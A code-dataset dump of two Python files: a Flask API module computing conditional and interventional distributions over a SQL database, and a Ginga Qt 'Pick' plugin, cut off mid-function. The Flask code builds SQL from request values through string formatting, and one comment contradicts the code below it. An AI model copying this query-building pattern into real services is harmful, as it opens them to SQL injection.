] | 3 | 2021-10-06T13:23:43.000Z | 2022-01-07T13:48:41.000Z | services/python-images/src/master/resources/distributions.py | hpi-epic/mpcsl | 05361acb0c8da68ddfa21f9fc9cd32a59255dc5c | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from flask_restful import Resource
from flask_restful_swagger_2 import swagger
from marshmallow import fields, validates, Schema, ValidationError
from src.master.helpers.database import get_db_session
from src.master.helpers.io import marshal, load_data, InvalidInputData
from src.master.helpers.swagger import get_default_response, oneOf
from src.models import Node, BaseSchema
from src.models.swagger import SwaggerMixin
DISCRETE_LIMIT = 10
def _custom_histogram(arr, max_bins=20, **kwargs):
    # Use 'auto' binning, but only up to 20 bins
    arr = np.asarray(arr)
    first_edge, last_edge = arr.min(), arr.max()
    width = np.lib.histograms._hist_bin_auto(arr, (first_edge, last_edge))
    bin_count = min(max_bins, int(np.ceil((last_edge - first_edge) / width))) if width else 1
    return np.histogram(arr, bins=bin_count, **kwargs)
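
# Usage sketch with synthetic data (not in the original file): the helper caps
# numpy's 'auto' binning at max_bins while keeping the usual histogram contract.
# counts, edges = _custom_histogram(np.random.randn(1000))
# assert len(counts) <= 20 and len(edges) == len(counts) + 1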
class DistributionSchema(BaseSchema, SwaggerMixin):
    node = fields.Nested('NodeSchema')
    dataset = fields.Nested('DatasetSchema')
    categorical = fields.Bool()


class ContinuousDistributionSchema(DistributionSchema):
    bins = fields.List(fields.Int())
    bin_edges = fields.List(fields.Float())
    categorical = fields.Constant(False, dump_only=True)


class DiscreteDistributionSchema(DistributionSchema):
    bins = fields.Dict(keys=fields.String(), values=fields.Int())  # Not enforced, just metadata in 2.x
    categorical = fields.Constant(True, dump_only=True)
class MarginalDistributionResource(Resource):
    @swagger.doc({
        'description': 'Returns the marginal distribution of an attribute as histogram values. '
                       'If the distribution is categorical, there is no bin_edges and bins '
                       'is a dictionary mapping values to counts',
        'parameters': [
            {
                'name': 'node_id',
                'description': 'Node identifier',
                'in': 'path',
                'type': 'integer',
                'required': True
            }
        ],
        'responses': get_default_response(oneOf([DiscreteDistributionSchema,
                                                 ContinuousDistributionSchema]).get_swagger()),
        'tags': ['Node', 'Distribution']
    })
    def get(self, node_id):
        node = Node.query.get_or_404(node_id)
        dataset = node.dataset
        session = get_db_session(dataset)

        result = session.execute(f"SELECT \"{node.name}\" FROM ({dataset.load_query}) _subquery_").fetchall()
        values = [line[0] for line in result]

        if len(np.unique(values)) <= DISCRETE_LIMIT:  # Categorical
            bins = dict([(str(k), int(v)) for k, v in zip(*np.unique(values, return_counts=True))])
            return marshal(DiscreteDistributionSchema, {
                'node': node,
                'dataset': dataset,
                'bins': bins
            })
        else:
            hist, bin_edges = _custom_histogram(values, density=False)
            return marshal(ContinuousDistributionSchema, {
                'node': node,
                'dataset': dataset,
                'bins': hist,
                'bin_edges': bin_edges
            })
class DiscreteConditionSchema(Schema, SwaggerMixin):
    categorical = fields.Constant(True)
    values = fields.List(fields.String)


class ContinuousConditionSchema(Schema, SwaggerMixin):
    categorical = fields.Constant(False)
    from_value = fields.Float()
    to_value = fields.Float()


class AutoConditionSchema(Schema, SwaggerMixin):
    auto = fields.Constant(True)


class ConditionalParameterSchema(Schema, SwaggerMixin):
    conditions = fields.Dict(keys=fields.Int(), values=fields.Dict())  # Not enforced, just metadata in 2.x

    @validates('conditions')
    def validate_params(self, conds):
        for key, val in conds.items():
            if not isinstance(val.get('auto', False), bool):
                raise ValidationError(f'Field `auto` must be bool for key {key}')
            if not val.get('auto', False):
                if 'categorical' not in val or not isinstance(val['categorical'], bool):
                    raise ValidationError(f'Field `categorical` must be bool for key {key}')
                if val['categorical']:
                    if 'values' not in val or not isinstance(val['values'], list):
                        raise ValidationError(f'Field `values` must be list for key {key}')
                else:
                    if 'from_value' not in val or not (
                            isinstance(val['from_value'], int) or isinstance(val['from_value'], float)):
                        raise ValidationError(f'Field `from_value` must be numeric for key {key}')
                    if 'to_value' not in val or not (
                            isinstance(val['to_value'], int) or isinstance(val['to_value'], float)):
                        raise ValidationError(f'Field `to_value` must be numeric for key {key}')
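
# Example body accepted by the validator above (values are illustrative and
# mirror the swagger example further down):
# {"conditions": {
#     "234":   {"categorical": True,  "values": ["3224", "43"]},
#     "4356":  {"categorical": False, "from_value": 2.12, "to_value": 2.79},
#     "95652": {"auto": True}
# }}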
class ConditionalContinuousDistributionSchema(ContinuousDistributionSchema):
    conditions = fields.Dict(keys=fields.Int(), values=fields.Dict())


class ConditionalDiscreteDistributionSchema(DiscreteDistributionSchema):
    conditions = fields.Dict(keys=fields.Int(), values=fields.Dict())
class ConditionalDistributionResource(Resource):
    @swagger.doc({
        'description': 'Returns the conditional distribution of an attribute as histogram values. '
                       'If the distribution is categorical, there is no bin_edges and bins '
                       'is a dictionary mapping values to counts. ',
        'parameters': [
            {
                'name': 'node_id',
                'description': 'Node identifier',
                'in': 'path',
                'type': 'integer',
                'required': True
            },
            {
                'name': 'conditions',
                'description': 'Dictionary mapping from node id to condition. There are three types of conditions, '
                               'continuous, discrete and automatic ones where the most common value or interval '
                               'is picked. For continuous conditions, from_value and to_value represent an inclusive '
                               'interval.',
                'in': 'body',
                'schema': {
                    'type': 'object',
                    'additionalProperties': oneOf([DiscreteConditionSchema, ContinuousConditionSchema,
                                                   AutoConditionSchema]).get_swagger(True),
                    'example': {
                        '234': {
                            'categorical': True,
                            'values': ['3224', '43']
                        },
                        '4356': {
                            'categorical': False,
                            'from_value': 2.12,
                            'to_value': 2.79
                        },
                        '95652': {
                            'auto': True
                        },
                    }
                }
            }
        ],
        'responses': get_default_response(oneOf([ConditionalDiscreteDistributionSchema,
                                                 ConditionalContinuousDistributionSchema]).get_swagger()),
        'tags': ['Node', 'Distribution']
    })
    def post(self, node_id):
        node = Node.query.get_or_404(node_id)
        dataset = node.dataset
        session = get_db_session(dataset)
        conditions = load_data(ConditionalParameterSchema)['conditions']

        base_query = f"SELECT \"{node.name}\" FROM ({dataset.load_query}) _subquery_"
        base_result = session.execute(base_query).fetchall()
        _, node_bins = _custom_histogram([line[0] for line in base_result])

        predicates = []
        for condition_node_id, condition in conditions.items():
            node_name = Node.query.get_or_404(condition_node_id).name

            # Auto-generate ranges by picking largest frequency
            if condition.get('auto', False):
                node_res = session.execute(f"SELECT \"{node_name}\" "
                                           f"FROM ({dataset.load_query}) _subquery_").fetchall()
                node_data = [line[0] for line in node_res]
                if len(np.unique(node_data)) <= DISCRETE_LIMIT:
                    values, counts = np.unique(node_data, return_counts=True)
                    condition['values'] = [int(values[np.argmax(counts)])]
                    condition['categorical'] = True
                else:
                    hist, bin_edges = _custom_histogram(node_data, density=False)
                    most_common = np.argmax(hist)
                    condition['from_value'] = bin_edges[most_common]
                    condition['to_value'] = bin_edges[most_common+1]
                    condition['categorical'] = False

            if condition['categorical']:
                predicates.append(f"\"{node_name}\" IN ({','.join(map(repr, condition['values']))})")
            else:
                predicates.append(f"\"{node_name}\" >= {repr(condition['from_value'])}")
                predicates.append(f"\"{node_name}\" <= {repr(condition['to_value'])}")

        categorical_check = session.execute(f"SELECT 1 FROM ({dataset.load_query}) _subquery_ "
                                            f"HAVING COUNT(DISTINCT \"{node.name}\") <= {DISCRETE_LIMIT}").fetchall()
        is_categorical = len(categorical_check) > 0

        query = base_query if len(predicates) == 0 else base_query + " WHERE " + ' AND '.join(predicates)
        result = session.execute(query).fetchall()
        data = [line[0] for line in result]

        if is_categorical:  # Categorical
            bins = dict([(str(k), int(v)) for k, v in zip(*np.unique(data, return_counts=True))])
            return marshal(ConditionalDiscreteDistributionSchema, {
                'node': node,
                'dataset': dataset,
                'bins': bins,
                'conditions': conditions
            })
        else:
            hist, bin_edges = np.histogram(data, bins=node_bins, density=False)
            return marshal(ConditionalContinuousDistributionSchema, {
                'node': node,
                'dataset': dataset,
                'bins': hist,
                'bin_edges': bin_edges,
                'conditions': conditions
            })
class InterventionalParameterSchema(Schema, SwaggerMixin):
    cause_node_id = fields.Int(required=True)
    effect_node_id = fields.Int(required=True)
    factor_node_ids = fields.List(fields.Int(), default=[])
    cause_condition = fields.Dict()

    @validates('cause_condition')
    def validate_params(self, cond):
        if DiscreteConditionSchema().validate(cond) and ContinuousConditionSchema().validate(cond):  # errors on both
            raise ValidationError('Condition must conform to DiscreteConditionSchema or ContinuousConditionSchema')
class InterventionalDistributionResource(Resource):
    @swagger.doc({
        'description': '',
        'parameters': [
            {
                'name': 'cause_node_id',
                'description': 'Node identifier of cause',
                'in': 'body',
                'schema': {
                    'type': 'integer',
                },
                'required': True
            },
            {
                'name': 'effect_node_id',
                'description': 'Node identifier of effect',
                'in': 'body',
                'schema': {
                    'type': 'integer',
                },
                'required': True
            },
            {
                'name': 'factor_node_ids',
                'description': 'Node identifiers of external factors',
                'in': 'body',
                'schema': {
                    'type': 'array',
                    'items': {'type': 'integer'},
                },
                'default': []
            },
            {
                'name': 'cause_condition',
                'description': 'Interventional value(s) of cause',
                'required': True,
                'in': 'body',
                'schema': oneOf([DiscreteConditionSchema, ContinuousConditionSchema]).get_swagger(True)
            }
        ],
        'responses': get_default_response(oneOf([DiscreteDistributionSchema,
                                                 ContinuousDistributionSchema]).get_swagger()),
        'tags': ['Node', 'Distribution']
    })
    def post(self):
        data = load_data(InterventionalParameterSchema)
        cause_condition = data['cause_condition']
        cause_node = Node.query.get_or_404(data['cause_node_id'])
        effect_node = Node.query.get_or_404(data['effect_node_id'])
        try:
            factor_node_ids = data.get('factor_node_ids', [])
            factor_nodes = [Node.query.get_or_404(factor_node_id) for factor_node_id in factor_node_ids]
        except ValueError:
            raise InvalidInputData('factor_node_ids must be array of ints')
        if effect_node in factor_nodes:
            raise InvalidInputData('The effect cannot be a predecessor of the cause')

        dataset = effect_node.dataset
        if not all([n.dataset == dataset for n in [cause_node] + factor_nodes]):
            raise InvalidInputData('Nodes are not all from same dataset')
        session = get_db_session(dataset)

        categorical_query = (f"SELECT 1 FROM ({dataset.load_query}) _subquery_ HAVING "
                             f"COUNT(DISTINCT \"{effect_node.name}\") <= {DISCRETE_LIMIT} AND "
                             f"COUNT(DISTINCT \"{cause_node.name}\") <= {DISCRETE_LIMIT}")
        for factor_node in factor_nodes:
            categorical_query += f" AND COUNT(DISTINCT \"{factor_node.name}\") <= {DISCRETE_LIMIT}"
        categorical_check = session.execute(categorical_query).fetchall()
        is_fully_categorical = len(categorical_check) > 0

        if is_fully_categorical:  # Categorical, can be done in DB
            # cause c, effect e, factors F
            # P(e|do(c)) = \Sigma_{F} P(e|c,f) P(f)
            category_query = session.execute(f"SELECT DISTINCT \"{effect_node.name}\" "
                                             f"FROM ({dataset.load_query}) _subquery_").fetchall()
            categories = [row[0] for row in category_query]
            num_of_obs = session.execute(f"SELECT COUNT(*) FROM ({dataset.load_query}) _subquery_").fetchone()[0]

            if cause_condition['categorical']:
                cause_predicate = (f"_subquery_.\"{cause_node.name}\" IN "
                                   f"({','.join(map(repr, cause_condition['values']))})")
            else:
                # Likely bug in the original: the upper bound reused from_value;
                # to_value matches the pandas branch below.
                cause_predicate = (f"_subquery_.\"{cause_node.name}\" >= {repr(cause_condition['from_value'])} AND "
                                   f"_subquery_.\"{cause_node.name}\" < {repr(cause_condition['to_value'])}")

            probabilities = []
            for category in categories:
                if len(probabilities) == len(categories) - 1:  # Probabilities will sum to 1
                    probabilities.append(1 - sum(probabilities))
                else:
                    do_sql = f"SELECT " \
                             f"COUNT(*) AS group_count, " \
                             f"COUNT(CASE WHEN {cause_predicate} THEN 1 ELSE NULL END) AS marginal_count, " \
                             f"COUNT(CASE WHEN {cause_predicate} " \
                             f"AND _subquery_.\"{effect_node.name}\"={repr(category)} THEN 1 ELSE NULL END) " \
                             f"AS conditional_count FROM ({dataset.load_query}) _subquery_ "
                    if len(factor_nodes) > 0:
                        factor_str = ','.join(['_subquery_.\"' + n.name + '\"' for n in factor_nodes])
                        do_sql += f"GROUP BY {factor_str}"
                    do_query = session.execute(do_sql).fetchall()
                    group_counts, marg_counts, cond_counts = zip(*[(line[-3], line[-2], line[-1]) for line in do_query])
                    probability = sum([
                        (cond_count / marg_count) * (group_count / sum(group_counts))
                        for group_count, marg_count, cond_count in zip(group_counts, marg_counts, cond_counts)
                        if marg_count > 0
                    ])
                    probabilities.append(probability)

            bins = dict([(str(cat), round(num_of_obs * float(prob))) for cat, prob in zip(categories, probabilities)])
            return marshal(DiscreteDistributionSchema, {
                'node': effect_node,
                'dataset': dataset,
                'bins': bins
            })
        else:
            factor_str = (', ' + ', '.join([f'"{n.name}"' for n in factor_nodes])) if len(factor_nodes) > 0 else ''
            result = session.execute(f"SELECT \"{cause_node.name}\", \"{effect_node.name}\"{factor_str} "
                                     f"FROM ({dataset.load_query}) _subquery_").fetchall()
            arr = np.array([line for line in result])
            _, bin_edges = _custom_histogram(arr[:, 1])
            arr[:, 1:] = np.apply_along_axis(
                lambda c: np.digitize(c, _custom_histogram(c)[1][:-1]), 0, arr[:, 1:])
            df = pd.DataFrame(arr, columns=([cause_node.name] + [effect_node.name] + [f.name for f in factor_nodes]))

            probabilities = []
            for effect_bin in range(1, len(bin_edges) - 1):
                group_counts, marg_counts, cond_counts = [], [], []
                factor_grouping = df.groupby(df.columns[2:].tolist()) if len(df.columns) > 2 else [('', df)]
                for factor_group, factor_df in factor_grouping:
                    if cause_condition['categorical']:
                        cause_mask = factor_df[cause_node.name].isin(cause_condition['values'])
                    else:
                        cause_mask = ((factor_df[cause_node.name] >= cause_condition['from_value']) &
                                      (factor_df[cause_node.name] < cause_condition['to_value']))
                    group_counts.append(len(factor_df))
                    marg_counts.append(len(factor_df[cause_mask]))
                    cond_counts.append(len(factor_df[cause_mask & (factor_df[effect_node.name] == effect_bin)]))
                probability = sum([
                    (cond_count / marg_count) * (group_count / sum(group_counts))
                    for group_count, marg_count, cond_count in zip(group_counts, marg_counts, cond_counts)
                    if marg_count > 0
                ])
                probabilities.append(probability)
            probabilities.append(1 - sum(probabilities))
            bins = [round(len(df) * float(prob)) for prob in probabilities]
            return marshal(ContinuousDistributionSchema, {
                'node': effect_node,
                'dataset': dataset,
                'bins': bins,
                'bin_edges': bin_edges,
            })
| 46.045783 | 120 | 0.55466 | 1,913 | 19,109 | 5.358599 | 0.147935 | 0.01873 | 0.013169 | 0.017559 | 0.420349 | 0.345137 | 0.27568 | 0.196274 | 0.171203 | 0.149254 | 0 | 0.006816 | 0.33199 | 19,109 | 414 | 121 | 46.157005 | 0.79624 | 0.017112 | 0 | 0.332378 | 0 | 0 | 0.184976 | 0.023015 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017192 | false | 0 | 0.028653 | 0 | 0.163324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6da9f79d2796f8456fd3c992ddac850201f870 | 18,233 | py | Python | ginga/qtw/plugins/Pick.py | Rbeaty88/ginga | 08451a81288b8defc54aa9f9e2af23a9ba32e985 | [
"BSD-3-Clause"
] | 1 | 2016-03-21T15:56:15.000Z | 2016-03-21T15:56:15.000Z | ginga/qtw/plugins/Pick.py | Rbeaty88/ginga | 08451a81288b8defc54aa9f9e2af23a9ba32e985 | [
"BSD-3-Clause"
] | null | null | null | ginga/qtw/plugins/Pick.py | Rbeaty88/ginga | 08451a81288b8defc54aa9f9e2af23a9ba32e985 | [
"BSD-3-Clause"
] | null | null | null | #
# Pick.py -- Pick plugin for Ginga fits viewer
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.qtw.QtHelp import QtGui, QtCore
from ginga.qtw import QtHelp
from ginga.util import iqcalc
from ginga.misc.plugins import PickBase
try:
    import matplotlib
    from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
    have_mpl = True
except ImportError:
    have_mpl = False
from ginga.qtw import ImageViewCanvasQt
class Pick(PickBase.PickBase):

    def __init__(self, fv, fitsimage):
        # superclass defines some variables for us, like logger
        super(Pick, self).__init__(fv, fitsimage)

        self.have_mpl = have_mpl
    def build_gui(self, container):
        assert iqcalc.have_scipy == True, \
            Exception("Please install python-scipy to use this plugin")

        self.pickcenter = None

        # Splitter is just to provide a way to size the graph
        # to a reasonable size
        vpaned = QtGui.QSplitter()
        vpaned.setOrientation(QtCore.Qt.Vertical)

        nb = QtHelp.TabWidget()
        nb.setTabPosition(QtGui.QTabWidget.East)
        nb.setUsesScrollButtons(True)
        self.w.nb1 = nb
        vpaned.addWidget(nb)

        cm, im = self.fv.cm, self.fv.im
        di = ImageViewCanvasQt.ImageViewCanvas(logger=self.logger)
        di.set_desired_size(200, 200)
        di.enable_autozoom('off')
        di.enable_autocuts('off')
        di.zoom_to(3, redraw=False)
        settings = di.get_settings()
        settings.getSetting('zoomlevel').add_callback('set',
                                                      self.zoomset, di)
        di.set_cmap(cm, redraw=False)
        di.set_imap(im, redraw=False)
        di.set_callback('none-move', self.detailxy)
        di.set_bg(0.4, 0.4, 0.4)
        self.pickimage = di

        bd = di.get_bindings()
        bd.enable_pan(True)
        bd.enable_zoom(True)
        bd.enable_cuts(True)

        iw = di.get_widget()
        sp = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding,
                               QtGui.QSizePolicy.MinimumExpanding)
        iw.setSizePolicy(sp)
        width, height = 200, 200
        iw.resize(width, height)
        nb.addTab(iw, 'Image')

        if have_mpl:
            self.w.fig = matplotlib.figure.Figure()
            self.w.ax = self.w.fig.add_subplot(111, axisbg='black')
            self.w.ax.set_aspect('equal', adjustable='box')
            self.w.ax.set_title('Contours')
            #self.w.ax.grid(True)
            canvas = MyFigureCanvas(self.w.fig)
            canvas.setDelegate(self)
            #canvas.resize(width, height)
            self.w.canvas = canvas
            nb.addTab(canvas, u"Contour")

            self.w.fig2 = matplotlib.figure.Figure()
            self.w.ax2 = self.w.fig2.add_subplot(111, axisbg='white')
            #self.w.ax2.set_aspect('equal', adjustable='box')
            self.w.ax2.set_ylabel('brightness')
            self.w.ax2.set_xlabel('pixels')
            self.w.ax2.set_title('FWHM')
            self.w.ax.grid(True)
            canvas = FigureCanvas(self.w.fig2)
            self.w.canvas2 = canvas
            nb.addTab(canvas, u"FWHM")

        sw = QtGui.QScrollArea()

        twidget = QtHelp.VBox()
        sp = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding,
                               QtGui.QSizePolicy.Fixed)
        twidget.setSizePolicy(sp)
        vbox = twidget.layout()
        vbox.setContentsMargins(4, 4, 4, 4)
        vbox.setSpacing(2)
        sw.setWidgetResizable(True)
        sw.setWidget(twidget)

        msgFont = self.fv.getFont('sansFont', 14)
        tw = QtGui.QLabel()
        tw.setFont(msgFont)
        tw.setWordWrap(True)
        self.tw = tw

        fr = QtHelp.Frame("Instructions")
        fr.layout().addWidget(tw, stretch=1, alignment=QtCore.Qt.AlignTop)
        vbox.addWidget(fr, stretch=0, alignment=QtCore.Qt.AlignTop)

        fr = QtHelp.Frame("Pick")

        nb = QtHelp.TabWidget()
        nb.setTabPosition(QtGui.QTabWidget.South)
        nb.setUsesScrollButtons(True)
        self.w.nb2 = nb
        fr.layout().addWidget(nb, stretch=1, alignment=QtCore.Qt.AlignLeft)
        vbox.addWidget(fr, stretch=0, alignment=QtCore.Qt.AlignTop)

        vbox2 = QtHelp.VBox()
        captions = (('Zoom', 'label', 'Contour Zoom', 'label'),
                    ('Object_X', 'label', 'Object_Y', 'label'),
                    ('RA', 'label', 'DEC', 'label'),
                    ('Equinox', 'label', 'Background', 'label'),
                    ('Sky Level', 'label', 'Brightness', 'label'),
                    ('FWHM X', 'label', 'FWHM Y', 'label'),
                    ('FWHM', 'label', 'Star Size', 'label'),
                    ('Sample Area', 'label', 'Default Region', 'button'),
                    )
        w, b = QtHelp.build_info(captions)
        self.w.update(b)
        b.zoom.setText(self.fv.scale2text(di.get_scale()))
        self.wdetail = b
        b.default_region.clicked.connect(self.reset_region)
        b.default_region.setToolTip("Reset region size to default")
        vbox2.addWidget(w, stretch=1)

        # Pick field evaluation status
        label = QtGui.QLabel()
        self.w.eval_status = label
        ## w.layout().addWidget(label, stretch=0, alignment=QtCore.Qt.AlignLeft)
        vbox2.addWidget(label, stretch=0)

        # Pick field evaluation progress bar and stop button
        hbox = QtHelp.HBox()
        pgs = QtGui.QProgressBar()
        pgs.setRange(0, 100)
        pgs.setTextVisible(True)
        self.w.eval_pgs = pgs
        hbox.addWidget(pgs, stretch=0)
        btn = QtGui.QPushButton("Stop")
        btn.clicked.connect(lambda w: self.eval_intr())
        btn.setEnabled(False)
        self.w.btn_intr_eval = btn
        hbox.addWidget(btn, stretch=0)
        vbox2.addWidget(hbox, stretch=0)

        nb.addTab(vbox2, "Readout")

        # Build settings panel
        captions = (('Show Candidates', 'checkbutton'),
                    ('Radius', 'xlabel', '@Radius', 'spinfloat'),
                    ('Threshold', 'xlabel', '@Threshold', 'entry'),
                    ('Min FWHM', 'xlabel', '@Min FWHM', 'spinfloat'),
                    ('Max FWHM', 'xlabel', '@Max FWHM', 'spinfloat'),
                    ('Ellipticity', 'xlabel', '@Ellipticity', 'entry'),
                    ('Edge', 'xlabel', '@Edge', 'entry'),
                    ('Max side', 'xlabel', '@Max side', 'spinbutton'),
                    ('Redo Pick', 'button'),
                    )
        w, b = QtHelp.build_info(captions)
        self.w.update(b)
        b.radius.setToolTip("Radius for peak detection")
        b.threshold.setToolTip("Threshold for peak detection (blank=default)")
        b.min_fwhm.setToolTip("Minimum FWHM for selection")
        b.max_fwhm.setToolTip("Maximum FWHM for selection")
        b.ellipticity.setToolTip("Minimum ellipticity for selection")
        b.edge.setToolTip("Minimum edge distance for selection")
        b.show_candidates.setToolTip("Show all peak candidates")
        b.show_candidates.setChecked(self.show_candidates)
        b.show_candidates.stateChanged.connect(self.show_candidates_cb)

        # radius control
        adj = b.radius
        adj.setRange(5.0, 200.0)
        adj.setSingleStep(1.0)
        adj.setValue(self.radius)

        def chg_radius(val):
            self.radius = val
            self.w.xlbl_radius.setText(str(self.radius))
            return True
        b.xlbl_radius.setText(str(self.radius))
        b.radius.valueChanged.connect(chg_radius)

        # threshold control
        def chg_threshold():
            threshold = None
            ths = str(self.w.threshold.text()).strip()
            if len(ths) > 0:
                threshold = float(ths)
            self.threshold = threshold
            self.w.xlbl_threshold.setText(str(self.threshold))
            return True
        b.xlbl_threshold.setText(str(self.threshold))
        b.threshold.returnPressed.connect(chg_threshold)

        # min fwhm
        adj = b.min_fwhm
        adj.setRange(0.1, 200.0)
        adj.setSingleStep(1.0)
        adj.setValue(self.min_fwhm)

        def chg_min(val):
            self.min_fwhm = val
            self.w.xlbl_min_fwhm.setText(str(self.min_fwhm))
            return True
        b.xlbl_min_fwhm.setText(str(self.min_fwhm))
        b.min_fwhm.valueChanged.connect(chg_min)

        # max fwhm
        adj = b.max_fwhm
        adj.setRange(0.1, 200.0)
        adj.setSingleStep(1.0)
        adj.setValue(self.max_fwhm)

        def chg_max(val):
            self.max_fwhm = val
            self.w.xlbl_max_fwhm.setText(str(self.max_fwhm))
            return True
        b.xlbl_max_fwhm.setText(str(self.max_fwhm))
        b.max_fwhm.valueChanged.connect(chg_max)

        # Ellipticity control
        def chg_ellipticity():
            minellipse = None
            val = str(self.w.ellipticity.text()).strip()
            if len(val) > 0:
                minellipse = float(val)
            self.min_ellipse = minellipse
            self.w.xlbl_ellipticity.setText(str(self.min_ellipse))
            return True
        b.xlbl_ellipticity.setText(str(self.min_ellipse))
        b.ellipticity.returnPressed.connect(chg_ellipticity)

        # Edge control
        def chg_edgew():
            edgew = None
            val = str(self.w.edge.text()).strip()
            if len(val) > 0:
                edgew = float(val)
            self.edgew = edgew
            self.w.xlbl_edge.setText(str(self.edgew))
            return True
        b.xlbl_edge.setText(str(self.edgew))
        b.edge.returnPressed.connect(chg_edgew)

        adj = b.max_side
        adj.setRange(5, 10000)
        adj.setSingleStep(10)
        adj.setValue(self.max_side)

        def chg_max_side(val):
            self.max_side = val
            self.w.xlbl_max_side.setText(str(self.max_side))
            return True
        b.xlbl_max_side.setText(str(self.max_side))
        b.max_side.valueChanged.connect(chg_max_side)

        b.redo_pick.clicked.connect(self.redo)

        nb.addTab(w, "Settings")

        captions = (
            ('Sky cut', 'button', 'Delta sky', 'entry'),
            ('Bright cut', 'button', 'Delta bright', 'entry'),
            )
        w, b = QtHelp.build_info(captions)
        self.w.update(b)

        b.sky_cut.setToolTip("Set image low cut to Sky Level")
        b.delta_sky.setToolTip("Delta to apply to low cut")
        b.bright_cut.setToolTip("Set image high cut to Sky Level+Brightness")
        b.delta_bright.setToolTip("Delta to apply to high cut")

        b.sky_cut.setEnabled(False)
        self.w.btn_sky_cut = b.sky_cut
        self.w.btn_sky_cut.clicked.connect(self.sky_cut)
        self.w.sky_cut_delta = b.delta_sky
        b.delta_sky.setText(str(self.delta_sky))
        b.bright_cut.setEnabled(False)
        self.w.btn_bright_cut = b.bright_cut
        self.w.btn_bright_cut.clicked.connect(self.bright_cut)
        self.w.bright_cut_delta = b.delta_bright
        b.delta_bright.setText(str(self.delta_bright))

        nb.addTab(w, "Controls")

        vbox3 = QtHelp.VBox()
        tw = QtGui.QPlainTextEdit()
        self.w.report = tw
        tw.setLineWrapMode(QtGui.QPlainTextEdit.NoWrap)
        vbox3.addWidget(self.w.report, stretch=1)
        self._appendText(tw, self._mkreport_header())

        btns = QtHelp.HBox()
        layout = btns.layout()
        layout.setSpacing(3)
        btn = QtGui.QPushButton("Add Pick")
        btn.clicked.connect(self.add_pick_cb)
        layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
        btn = QtGui.QCheckBox("Record Picks")
        btn.setChecked(self.do_record)
        btn.stateChanged.connect(self.record_cb)
        layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
        vbox3.addWidget(btns, stretch=0, alignment=QtCore.Qt.AlignLeft)

        nb.addTab(vbox3, "Report")

        ## vbox4 = QtHelp.VBox()
        ## tw = QtGui.QPlainTextEdit()
        ## self.w.correct = tw
        ## tw.setLineWrapMode(QtGui.QPlainTextEdit.NoWrap)
        ## self._appendText(tw, "# paste a reference report here")
        ## vbox4.addWidget(self.w.correct, stretch=1)
        ## btns = QtHelp.HBox()
        ## layout = btns.layout()
        ## layout.setSpacing(3)
        ## btn = QtGui.QPushButton("Correct WCS")
        ## btn.clicked.connect(self.correct_wcs)
        ## layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
        ## vbox4.addWidget(btns, stretch=0, alignment=QtCore.Qt.AlignLeft)
        ## nb.addTab(vbox4, "Correct")

        btns = QtHelp.HBox()
        layout = btns.layout()
        layout.setSpacing(3)
        #btns.set_child_size(15, -1)

        btn = QtGui.QPushButton("Close")
        btn.clicked.connect(self.close)
        layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
        vbox.addWidget(btns, stretch=0, alignment=QtCore.Qt.AlignLeft)

        vpaned.addWidget(sw)

        container.addWidget(vpaned, stretch=1)
        #vpaned.moveSplitter(260, 1)
    def _setText(self, w, text):
        w.setText(text)

    def _appendText(self, w, text):
        w.appendPlainText(text)

    def _copyText(self, w):
        return w.toPlainText()

    def _getText(self, w):
        return w.toPlainText()

    def _setEnabled(self, w, tf):
        w.setEnabled(tf)

    def record_cb(self, do_record):
        self.do_record = bool(do_record)

    def instructions(self):
        self.tw.setText("""Left-click to place region. Left-drag to position region. Redraw region with the right mouse button.""")

    def update_status(self, text):
        self.fv.gui_do(self.w.eval_status.setText, text)

    def init_progress(self):
        self.w.btn_intr_eval.setEnabled(True)
        self.w.eval_pgs.setValue(0)
        #self.w.eval_pgs.set_text("%.2f %%" % (0.0))

    def update_progress(self, pct):
        self.w.eval_pgs.setValue(int(pct * 100.0))
        #self.w.eval_pgs.set_text("%.2f %%" % (pct*100.0))

    def show_candidates_cb(self, tf):
        self.show_candidates = tf
        if not self.show_candidates:
            # Delete previous peak marks
            objs = self.fitsimage.getObjectsByTagpfx('peak')
            self.fitsimage.deleteObjects(objs, redraw=True)

    def adjust_wcs(self, image, wcs_m, tup):
        d_ra, d_dec, d_theta = tup
        msg = "Calculated shift: dra, ddec = %f, %f\n" % (
            d_ra/3600.0, d_dec/3600.0)
        msg += "Calculated rotation: %f deg\n" % (d_theta)
        msg += "\nAdjust WCS?"

        dialog = QtHelp.Dialog("Adjust WCS",
                               0,
                               [['Cancel', 0], ['Ok', 1]],
                               lambda w, rsp: self.adjust_wcs_cb(w, rsp, image, wcs_m))
        box = dialog.get_content_area()
        layout = QtGui.QVBoxLayout()
        box.setLayout(layout)
        layout.addWidget(QtGui.QLabel(msg), stretch=1)
        dialog.show()

    def adjust_wcs_cb(self, w, rsp, image, wcs_m):
        w.close()
        if rsp == 0:
            return

        #image.wcs = wcs_m.wcs
        image.update_keywords(wcs_m.hdr)
        return True

    def plot_scroll(self, event):
        delta = event.delta()
        direction = None
        if delta > 0:
            direction = 'up'
        elif delta < 0:
            direction = 'down'
        if direction == 'up':
            #delta = 0.9
            self.plot_zoomlevel += 1.0
        elif direction == 'down':
            #delta = 1.1
            self.plot_zoomlevel -= 1.0
        self.plot_panzoom()

        # x1, x2 = self.w.ax.get_xlim()
        # y1, y2 = self.w.ax.get_ylim()
        # self.w.ax.set_xlim(x1*delta, x2*delta)
        # self.w.ax.set_ylim(y1*delta, y2*delta)
        # self.w.canvas.draw()
    def plot_button_press(self, event):
        buttons = event.buttons()
        x, y = event.x(), event.y()

        button = 0
